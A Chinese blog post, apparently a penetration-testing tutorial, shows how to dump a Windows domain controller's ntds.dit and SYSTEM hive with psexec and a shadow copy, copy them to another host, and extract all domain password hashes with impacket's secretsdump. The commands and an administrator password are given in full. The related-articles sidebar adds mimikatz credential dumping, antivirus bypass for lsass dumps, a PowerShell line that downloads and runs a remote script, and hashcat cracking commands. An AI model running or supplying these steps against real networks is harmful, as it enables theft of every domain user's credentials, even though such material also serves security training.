内网安全:05.dump内网DC的ntds.dit,获取hash

最新推荐文章于 2024-05-14 09:50:30 发布
最新推荐文章于 2024-05-14 09:50:30 发布
阅读量164 收藏
点赞数
文章标签: windows 加密解密 信息安全 hash 安全
原文链接:https://blog.51cto.com/14563906/2503125
版权

叙述:有时候我们碰到一个内网环境,有DC的密码,于是使用这个方法,导出DC中所有内网主机的密码并破解

0x0 环境
DC:172.31.20.30  domain用户:pentest\administrator 密码:UFhae&pwL%F
内网主机A(win 2012):172.31.21.166
psexec: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
secretsdump:https://github.com/SecureAuthCorp/impacket/releases
0x1 使用psexec 导出加密后的ntds.dit
使用psexec 获取信息:
psexec /accepteula \172.31.20.30 -u pentest\administrator -p "UFhae&pwL%F" -h cmd /c "vssadmin create shadow /for=c: >> \172.31.21.166\c$\out.txt" #获取信息且输出到out.txt,成功

内网安全:05.dump内网DC的ntds.dit,获取hash

使用psexec 导出加密后的ntds.dit:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit \172.31.21.166\c$\"

内网安全:05.dump内网DC的ntds.dit,获取hash

使用psexec 导出加密后的system:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \172.31.21.166\c$\"

内网安全:05.dump内网DC的ntds.dit,获取hash

我们有了ntds.dit和system就可以解密了

0x2 解密ntds.dit和system
工具是:impacket里的secretsdump
我用的kali,这个工具windows也是支持的。。。。-------&bugfor首发:菊花槿&
kali先快速安装:
pip install .
然后把ntds.dit和system放到secretsdump.py一起执行:
secretsdump.py -ntds ntds.dit -system SYSTEM local

内网安全:05.dump内网DC的ntds.dit,获取hash

扫描后拿去解密hash即可:
内网安全:05.dump内网DC的ntds.dit,获取hash

qq_38461724
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
绕过360实现lsass转储
hongduilanjun的博客
04-18 949
前言 获取Windows用户的凭证信息是渗透过程中至关重要的一步。 没杀软,只要有权限想怎么读就怎么读。 有杀软,得用一些特别的技巧。 注:本机所有测试均为物理机,且为最新版AV Mimikatz直接读取Lsass进程 权限提升 privilege::debug 抓取密码 sekurlsa::logonpasswords [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BSPqd5Xv-1650257094211)(image-20220411145456534.png
dump-env:创建.env文件的实用工具
01-30
创建.env文件的实用工具 dump-env使用.env.template文件和一些可选的环境变量从这两个来源创建新的.env文件。 不使用外部依赖项。为什么? 为什么我们需要这样的工具? 好吧,当您的CI正在构建docker (或其他)映像...
离线导取域控制器HASH的工具NTDSDUMP
03-11
离线导取域控制器HASH神器,必须同时有域控制器上导取的ntds.dit文件以及SYSTEM文件,SYSTEM文件可通过“reg save hklm\system system.hive”
NTDS.dit获取密码hash
a3320315的博客
05-31 392
获取NTDS.dit 加载ps脚本 IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.5/Invoke-NinjaCopy.ps1"); 提取本地sam文件 Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Users\Administrator\Desktop\sam 提取域控NTDS.dit Invoke-NinjaCopy
使用ntds_hashextractDumpntds密码
iteye_16188的博客
10-03 200
原文:https://www.pentestgeek.com/2012/11/16/dumping-domain-password-hashes-using-metasploit-ntds_hashextract-rb/ ntds_hashextract.rb是一个可以从NTDS.dit 导出的时间表中快速提取密码hash的工具。 第一步:安装Libesedb包 [color=blue]wg...
dump hash常见方法总结
weixin_44747030的博客
10-01 1375
Dump Hash常见方法总结
Android hprof 自动化dump heap脚本:djheap.sh
08-26
Android hprof 自动化dump heap脚本 MAC 上执行脚本: pid 为 app 的进程 id sh ./djheap.sh [packageName] [pid] 导出 hprof 文件可以用 mat 工具进行分析
空白卡数据.dump
04-08
IC卡空白卡数据,空白数据可复制到NFC设备。如手环,手机。设备先复制空白数据,再用写卡工具将IC卡数据写入到NFC设备上,就可以用NFC设备刷门禁,电梯之类的了。
database-dump:magnets.moe数据库的转储
03-04
载入中要将转储的内容加载到新数据库中,必须使用的dump程序。 如此处所述编译它。 之后,您可以按照以下示例加载数据库。 我们假设数据库被称为magnets : psql -f ddl/pre-data.sql magnets postgresdump --...
lsassdump_Lsass.exe_lsassexedump_lsass.dump_dump_dumphash_
09-29
dump lsass.exe 进程
ntdsdump.zip
12-12
ntdsdump:快速从ntds.dit文件提取Hash密码的工具 使用命令举例:Hashcat64 -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username 参数说明: “-m 1000” 表示破解密码类型为“NTLM”; “-a 0”表示采用字典破解; “-o”将破解后的结果输出到winpassok.txt; “–remove win.hash”表示从win.hash移除破解成功的hash,带username不能跟remove同时使用,也就可以对单一密码值进行整理,然后使用该参数。 “password.lst”为密码字典文件。 破解过程会显示“[s]tatus[p]ause [r]esume [b]ypass [q]uit =>”,键盘输入“s”显示破解状态,输入“p”暂停破解,输入“r”继续破解,输入“b”表示忽略破解,输入“q”表示退出,所有成功破解的结果都会自动保存在 “hashcat.pot” 文件中
域控安全 ----> Ntds
最新发布
2401_84969291的博客
05-14 323
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
ntds.dit文件的获取与解密
热门推荐
Shanfenglan's blog
08-21 28万+
它们在哪儿? ntds.dit文件是域环境中域控上会有的一个文件,这个文件存储着域内所有用户的凭据信息(hash)。非域环境也就是在工作组环境中,有一个sam文件存储着当前主机用户的密码信息,想要破解sam文件与ntds.dit文件都需要拥有一个system文件。 ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit system文件位置:C:\Windows\System32\config\SYSTEM sam文件位置:C:\Windows\System32\config\SAM
ntds.dit 获取域内用户ntlm hash
qq_46635165的博客
11-17 2133
前提:在获取了域控权限后,可以通过读取ntds.dit 获取域内更多资产信息 概念: 在活动目录中,所有域内数据都保存在ntds.dit中,存储位置为 %SystemRoot%\ntds\ntds.dit,ntds.dit中包含用户名,散列值,组,OU,GPP等活动目录相关信息; 在域控主机中默认自带了ntdsutil.exe ,是一个为活动目录提供管理机制的程序,使用ntdsutil.exe 用于维护活动目录等,ntdsutil.exe 支持的操作系统有win2003,win2008,win2012; 目
几款优秀的Windows密码抓取工具
LuckySec
03-24 6938
前言 本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。 0x01 Mimikatz 个人点评:这款工具非常强大,公认的Windows密码神器。 1. 简介 Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。mimikatz还可以执行哈希传递,票证传递或构建Golden票证 项目地址:https://github.com/gentilkiwi/mimikatz/ 2. 使用 cmd运行
Windowsntds.dit中提取Hash和域信息
子曰小玖的博客
04-30 939
在渗透测试进入内网之后,首要目标就是得到域控权限,将域中所有用户的hash值全部跑出来,下载到本地。很多工具比如meterpreter中的smart_hashdump和Impacket中的secretsdump.py都可以做到。 但是有些情况下我只能拷贝出来NTDS.dit文件,然后离线将这些密码提取出来。今天正好碰到了这一情况,接下来我将详细的介绍一下如何将密码导出,当然假设我已经成功将这两个...
优化代码:def save_file(data, out_path): if not os.path.exists(out_path): os.mkdir(out_path) with open(out_path, 'w') as f: json.dump(data, f)
06-09
json.dump(data, f, ensure_ascii=False) except Exception as e: # 记录错误信息到日志文件中 with open('error.log', 'a', encoding='utf-8') as f: f.write(f'Error in save_file: {str(e)}\n') ``` 其中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值